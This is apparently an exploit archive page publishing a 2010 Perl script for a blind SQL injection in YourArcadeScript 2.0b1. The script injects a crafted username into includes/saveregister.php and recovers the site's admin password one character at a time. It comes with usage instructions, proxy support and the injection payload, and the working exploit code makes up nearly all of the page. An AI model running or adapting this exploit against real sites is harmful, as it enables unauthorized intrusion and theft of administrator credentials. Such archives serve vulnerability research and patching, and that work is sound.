what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

YourArcadeScript 2.0b1 Blind SQL Injection

YourArcadeScript 2.0b1 Blind SQL Injection
Posted May 28, 2010
Authored by DNX

YourArcadeScript version 2.0b1 remote blind SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 3eb62d3df61ff102668bb15b2a5847118a286373f834dad365a866b8e4504be3

YourArcadeScript 2.0b1 Blind SQL Injection

Change Mirror Download
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Getopt::Long;

# \#'#/
# (-.-)
# ------------------oOO---(_)---OOo-----------------
# | __ __ |
# | _____/ /_____ ______/ /_ __ ______ ______ |
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
# | Security Research Division /____/ 2o1o |
# --------------------------------------------------
# | YourArcadeScript v2.0b1 Blind SQL Injection |
# --------------------------------------------------
# [!] Discovered by.: DNX
# [!] Homepage......: http://starbugs.host.sk
# [!] Vendor........: http://www.yourarcadescript.com
# [!] Detected......: 21.05.2010
# [!] Reported......: 22.05.2010
# [!] Response......: xx.xx.2010
#
# [!] Background....: Our script has features that other scripts have but ours is
# FREE! YourArcadeScript is a free arcade script, but can be
# used for pictures, youtube, or other media files.
#
# [!] Requirements..: magic_quotes_gpc = Off
#
# [!] Bug...........: $_POST["username"] in includes/saveregister.php near line 3
#
# 03: $username=$_POST["username"];
#
# 11: $res=mysql_query("select * from user where username like '$username'") or die(mysql_error());
#

if(!$ARGV[1])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n --------------------oOO---(_)---OOo--------------------";
print "\n | YourArcadeScript v2.0b1 Blind SQL Injection Exploit |";
print "\n | coded by DNX |";
print "\n -------------------------------------------------------";
print "\n[!] Usage: perl yas.pl [Host] [Path] <Options>";
print "\n[!] Example: perl yas.pl 127.0.0.1 /yas/";
print "\n[!] Options:";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}

my %options = ();
GetOptions(\%options, "p=s");
my $ua = LWP::UserAgent->new();
my $host = $ARGV[0];
my $path = $ARGV[1];
my $target = "http://".$host.$path;

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

print "[!] Exploiting...\n";

go();

print "\n[!] Exploit done\n";

sub go
{
syswrite(STDOUT, "[!] Get Admin Password: ", 24);
for(my $i = 1; $i <= 32; $i++)
{
my $found = 0;
my $h = 48 ;
while(!$found && $h <= 102)
{
if(exploit($i, $h))
{
$found = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
if($h == 58)
{
$h = 97;
}
}
}
}

sub exploit
{
my $i = shift;
my $h = shift;
my $url = $target."includes/saveregister.php";
my $inj = "_#1337#_' or substring((select password FROM settings limit 1),".$i.",1)=CHAR(".$h.")/*";
my $req = POST $url, [username => $inj];
my $res = $ua->request($req);

if($res->content =~ /Sorry username exists register again/s)
{
return 1;
}
else
{
return 0;
}
}
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close